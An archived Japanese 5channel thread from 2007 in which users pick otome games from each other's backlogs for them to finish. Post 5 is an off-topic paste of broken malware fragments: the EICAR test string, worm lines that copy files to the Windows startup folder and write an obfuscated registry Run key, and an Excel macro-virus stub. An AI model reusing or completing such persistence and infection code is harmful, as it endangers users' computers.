5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

積みゲ崩し促進スレ@女向け一般板 3段目

1 :名無しって呼んでいいか?:2007/10/09(火) 00:44:55 ID:???
「話題作だから」「安かった」「信者だし」「属性で」「衝動買い」「積むために」
ゲームを買う理由はさまざまですが、買うだけで満足していませんか?
せっかく買ったのですから是非ともプレイしてみてはいかがでしょう。
「しかし、どれから崩していいのか分からない。」
ここはそんなあなたの背中を優しく押してあげるスレッドです。
ルール
1.**9を取った人は指名権獲得。前レス**0の積みゲタイトルを指定できます。
  **0が現れるまで数日かかることもあります。待つ間にお茶と栗きんとんでもどぞー( ´∀`)つ旦~ω
2.積みゲを崩したい人が**0を取ります。そして積みゲ・放置ゲ(乙女・ボブゲ混在可)を何本かリストアップしてください。
3.**9はリストの中から崩してほしいタイトルを指定します。
4.**0は指定された積みゲを崩し、感想をどこかのスレに書いたら、このスレにて崩し報告をしてください。
5.つまりレス10が積みゲ晒し → 19が10のリストの中から気分・ノリ・流れ・見たことないから・自分もやっているからなどという独断で指定。

まあ、ぶっちゃけると「**9が指定したゲームを**0が崩すスレ」です。


前スレ
積みゲ崩し促進スレ@女向け一般板 2段目
http://game12.2ch.net/test/read.cgi/ggirl/1184337031/

2 :名無しって呼んでいいか?:2007/10/09(火) 00:45:32 ID:???
注意事項
1.**9・**0を取る人は、そのレス限りのものでかまわないので、なるべくトリップをつけてください。
  また、**9・**0が広告に取られた場合や、指定番号を取った人が逃げた場合は、繰り下げで指名・被指名してください。
2.リストアップするゲームに制限はありませんが、新作ばかりでリストを構成するのはご遠慮ください。
  このスレでの積みゲの定義は
  「購入から手付かずのもの。あるいは進めたものの途中放置されてしまったゲーム」です。
  この条件に該当するものを1つは含めてください。
3.基本はマターリヽ( ´ー`)ノシ
4.コテハンの方もそうでない方も奮ってご参加ください。
5.sage進行推奨。
6.基本的に全年齢対象商品をお願いします。PS、PS2、PCで。
7.追加ディスクなどで18禁になるものも扱ってもいいですが、追加部分の話題はさけてください。
 また、そういうソフトばかりを積んでいる方は、大人板に同じようなスレがありますのでそちらでお願いします。
 むしろ追加ディスクを買ったり使ったりするのは自由ですが、話題にしないでくださいということです
8.次スレは979辺りで

3 :名無しって呼んでいいか?:2007/10/09(火) 00:49:54 ID:???
>>1
乙です!

4 :名無しって呼んでいいか?:2007/10/09(火) 00:53:23 ID:???
過去スレにこちらも追加でヨロ

積みゲ崩し促進スレ@女向け一般板
http://game12.2ch.net/test/read.cgi/ggirl/1149216423/



5 :名無しって呼んでいいか?:2007/10/09(火) 01:00:24 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :名無しって呼んでいいか?:2007/10/09(火) 01:48:23 ID:???
>>1、d&乙です

7 :名無しって呼んでいいか?:2007/10/09(火) 08:55:00 ID:???
>>1
0まで梅

8 :名無しって呼んでいいか?:2007/10/09(火) 11:49:06 ID:???
>>1
乙です

9 :名無しって呼んでいいか?:2007/10/09(火) 18:51:27 ID:???
>>1
うめ

10 :名無しって呼んでいいか?:2007/10/09(火) 20:40:37 ID:???
以前もお世話になりました。またお願いします。

・ネオアン(ニクスのみ未クリア)
・コルダ(柚木・土浦以外未クリア)
・GS2(隠し・女の子・遊・姫子未クリア)
・ラスエス(チヒロ以外未クリア)
・ひめひび(許婚以外未クリア)
・GSファーストラブ(姫条以外未クリア)


以下未開封
・フルキス
・水
・水2
・魔法使い
・コルダ2
・コルダ2アンコール
・イヅナ
・オレンジハニー
・らぶどろ
・ビタミン
・パニパレ
・悠久ノ桜

↓よろしければ前スレ990さんの指定お願いします。

11 :名無しって呼んでいいか?:2007/10/09(火) 20:52:12 ID:???
では
前スレ990さんGSスズカで促進!

>>10
GS2の姫子促進
ある意味斬新

12 :名無しって呼んでいいか?:2007/10/09(火) 21:08:28 ID:???
悠久ノ桜開封して感想聞かせてほしい
促進ー

13 :名無しって呼んでいいか?:2007/10/09(火) 21:15:51 ID:???
>>1
乙です

コルダ2開封して加地に会ってくるのはどうだろう
促進

14 :名無しって呼んでいいか?:2007/10/09(火) 21:20:46 ID:???
未開封多すぎじゃねwww?
ここまできたらネオアンをコンプしちゃえ!

15 :名無しって呼んでいいか?:2007/10/09(火) 21:35:28 ID:???
オトメゲーを積む姐さんが多いのは
やっぱりオトメゲーがすぐ生産終了しちゃうからデツカ?

16 :名無しって呼んでいいか?:2007/10/09(火) 21:56:36 ID:???
GS2隠し促進

17 :名無しって呼んでいいか?:2007/10/09(火) 21:59:37 ID:???
パニパレ乃凪で促進

18 :名無しって呼んでいいか?:2007/10/09(火) 23:07:04 ID:???
コルダ二人を股がけで促進

19 :名無しって呼んでいいか?:2007/10/09(火) 23:07:23 ID:???
>>15
自分は特典目当てで買い、そして一通り特典を堪能した後、本体を積む。

>>10
悠久促進。
感想聞かせて翡翠でヘコんだ私の背中を押してくれ。

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)